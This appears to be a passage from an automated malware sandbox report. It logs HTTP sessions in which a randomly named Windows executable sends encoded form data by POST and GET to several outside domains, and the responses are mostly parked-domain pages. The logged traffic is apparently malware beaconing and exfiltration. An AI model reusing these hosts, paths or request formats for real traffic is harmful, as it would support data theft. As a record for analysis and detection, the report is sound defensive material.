                                                                            Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                                                            Jun 19, 2024 22:40:57.258599997 CEST654INData Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67
                                                                            Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.449775194.9.94.86805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:59.152934074 CEST728OUTPOST /r45o/ HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.torentreprenad.com
                                                                            Referer: http://www.torentreprenad.com/r45o/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 74 79 62 52 70 2f 42 50 6a 4a 65 68 4b 7a 6d 4a 58 75 64 39 50 71 55 53 63 33 56 32 36 39 46 55 79 2b 48 50 70 63 52 38 68 71 76 73 49 67 47 6a 38 43 2f 37 41 69 7a 58 39 43 76 53 6d 50 37 41 46 6e 58 5a 53 4c 6f 78 74 6e 66 57 4e 61 44 77 4f 75 6a 53 34 6e 56 66 68 69 79 67 63 53 56 4e 58 73 75 48 79 5a 49 32 47 4d 74 33 6e 72 6d 75 6f 69 34 68 37 38 6d 58 54 37 4a 68 78 43 71 59 62 76 6f 73 34 4f 33 49 68 47 6b 4a 79 4d 71 5a 58 66 4b 42 78 77 66 47 59 6a 61 30 4a 6d 42 4d 4d 76 79 65 72 31 2b 72 49 5a 46 6b 37 51 36 4e 66 39 32 37 6d 46 69 48 41 68 69 71 4b 4d 6c 69 43 36 70 4d 58 4a 76 36 74 56 45 3d
                                                                            Data Ascii: tF1tk6=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V269FUy+HPpcR8hqvsIgGj8C/7AizX9CvSmP7AFnXZSLoxtnfWNaDwOujS4nVfhiygcSVNXsuHyZI2GMt3nrmuoi4h78mXT7JhxCqYbvos4O3IhGkJyMqZXfKBxwfGYja0JmBMMvyer1+rIZFk7Q6Nf927mFiHAhiqKMliC6pMXJv6tVE=
                                                                            Jun 19, 2024 22:40:59.790719032 CEST1236INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:40:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:40:59.790807962 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                            Jun 19, 2024 22:40:59.790862083 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                            Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                            Jun 19, 2024 22:40:59.790909052 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                                            Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                            Jun 19, 2024 22:40:59.790963888 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                                            Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.449776194.9.94.86805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:01.684840918 CEST10810OUTPOST /r45o/ HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.torentreprenad.com
                                                                            Referer: http://www.torentreprenad.com/r45o/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 74 79 62 52 70 2f 42 50 6a 4a 65 68 4b 7a 6d 4a 58 75 64 39 50 71 55 53 63 33 56 32 36 38 52 55 79 73 2f 50 6f 39 52 38 67 71 76 73 47 41 47 69 38 43 2b 35 41 69 36 63 39 43 72 43 6d 4e 44 41 44 45 66 5a 58 2b 55 78 34 33 66 57 45 36 44 78 41 4f 6a 39 34 6e 46 62 68 6a 43 67 63 53 56 4e 58 75 61 48 31 49 49 32 45 4d 74 32 67 72 6d 69 2b 69 34 4a 37 38 2b 74 54 36 39 62 77 79 4b 59 61 50 34 73 30 63 76 49 38 57 6c 76 7a 4d 71 4b 58 66 58 66 78 7a 37 77 59 6d 6d 4b 4a 6b 64 4d 64 35 2f 58 2f 42 36 4a 5a 49 78 51 73 77 75 33 52 39 4f 65 67 6d 79 2b 4b 51 71 4d 53 66 5a 4c 4b 64 59 6d 41 49 69 67 37 53 4d 53 30 7a 4c 32 41 30 6f 56 44 33 41 52 71 48 72 46 6b 72 43 41 6e 53 55 73 74 43 79 63 55 7a 64 55 79 58 70 39 69 41 34 6b 30 4d 59 35 79 62 7a 50 38 74 52 73 30 68 5a 58 33 72 6b 46 6b 51 44 6f 75 43 49 59 4b 42 6a 7a 30 36 47 77 41 6d 52 2f 34 6d 49 59 54 61 6a 78 39 46 6e 4e 44 44 44 68 65 4b 49 73 7a 41 59 53 5a 30 2f 64 6a 68 68 37 45 4a 77 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V268RUys/Po9R8gqvsGAGi8C+5Ai6c9CrCmNDADEfZX+Ux43fWE6DxAOj94nFbhjCgcSVNXuaH1II2EMt2grmi+i4J78+tT69bwyKYaP4s0cvI8WlvzMqKXfXfxz7wYmmKJkdMd5/X/B6JZIxQswu3R9Oegmy+KQqMSfZLKdYmAIig7SMS0zL2A0oVD3ARqHrFkrCAnSUstCycUzdUyXp9iA4k0MY5ybzP8tRs0hZX3rkFkQDouCIYKBjz06GwAmR/4mIYTajx9FnNDDDheKIszAYSZ0/djhh7EJw1gR3HLz3LpbR+JlKH1Qd5ZVkQIFfAYBUvzL+ri+E4X7f7Kwjz2Xa3fZ5EwZbGgBuIs9DqC7M42T4Q2zZl1VthTRNvZ1yKRhiRtXmImHp+B0EulVP96WPYM8IgFCeA+h4qBUb7aVP0ruyQEaOE+Xb/98+3++01QybCLHqbnqE/JBZW1aSQP1adq+QWPVGfzA1TYUHorW0VvsL7pwovqhpSjs3GMTftp1ofK0c4KUnjFvZ4/3N+OwgXOr7gIgYoa0c2J/62xFOVU2+12u5S7EkBH+lMZSxFGxLDWituO11+EGDGSO8e+nR40saQcCBXNLieBuabApn+oWshmrmt5epjbxzJ+O7qmB5G6JztWGK0V8pWtKXgm2ZBO8NXUasHn4FIk2S66EjSiO2BR54ieVfY7NWnUKyiLVc5pY9snuLTjaXBjXBfzJcxfKBnzMitHHRBdpskNi5jnOHhFf3DtUPT/yBBcjQiILbnHXx/JH8I4LpQKN2F8xoJl2owUt50o4zdfNEbwx6MM932FGSm+P/AkAEGZkCHcQ1DxcwUBz19lzhWK8Xi8+N7rpJFHdZTpWgtcFz6kmyUF0sOTIAiwjFldG4dXL9HK8CKNOzTTgZ8XrxlynQFP1Rvm9x7HGpj6EgCs/8Zgu6nXjgYEIKqpvBpJ2Li6TjHm/fpq [TRUNCATED]
                                                                            Jun 19, 2024 22:41:02.344038010 CEST1236INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:02 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:41:02.344183922 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                            Jun 19, 2024 22:41:02.344253063 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                            Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                            Jun 19, 2024 22:41:02.344301939 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                                            Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                            Jun 19, 2024 22:41:02.344356060 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                                            Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.449777194.9.94.86805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:04.218070030 CEST437OUTGET /r45o/?tF1tk6=gzu5VRbRlKcxtiemuOhQ9ZWHLhmKbuZrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2onP9LYfMGpPV91FzvjCQRh4kOtmo5I82F50=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:04.873490095 CEST1236INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:41:04.873570919 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                            Jun 19, 2024 22:41:04.873624086 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                            Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                            Jun 19, 2024 22:41:04.873675108 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                                            Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                            Jun 19, 2024 22:41:04.873727083 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                                            Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.44977835.214.235.206805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:09.959657907 CEST693OUTPOST /4iea/ HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.grecanici.com
                                                                            Referer: http://www.grecanici.com/4iea/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 48 73 51 52 4b 62 74 33 77 7a 4f 53 34 74 45 79 4a 2f 34 51 6c 69 52 47 75 76 33 52 47 6d 6f 4a 38 41 73 48 44 79 4d 44 50 49 66 30 6c 63 54 50 48 61 67 6a 45 76 54 67 37 58 46 4d 6d 32 4e 48 2f 79 74 61 62 77 70 31 78 6a 57 58 54 50 75 45 65 62 5a 66 6d 6a 74 6c 36 4c 47 4e 32 6b 67 39 30 46 71 2f 6e 73 6b 4e 47 44 6e 58 49 4d 2b 64 4a 39 78 41 57 44 6d 77 46 64 6c 38 55 41 58 51 32 30 32 36 34 51 6e 67 6d 54 31 75 6b 72 6b 4b 7a 33 6a 56 71 64 68 62 36 38 6b 43 46 35 32 6a 61 46 37 4d 44 30 32 30 78 52 2f 56 79 4c 68 34 6e 58 44 31 45 51 3d 3d
                                                                            Data Ascii: tF1tk6=GNnztYNOslY1HsQRKbt3wzOS4tEyJ/4QliRGuv3RGmoJ8AsHDyMDPIf0lcTPHagjEvTg7XFMm2NH/ytabwp1xjWXTPuEebZfmjtl6LGN2kg90Fq/nskNGDnXIM+dJ9xAWDmwFdl8UAXQ20264QngmT1ukrkKz3jVqdhb68kCF52jaF7MD020xR/VyLh4nXD1EQ==
                                                                            Jun 19, 2024 22:41:10.590784073 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:10 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Content-Encoding: br
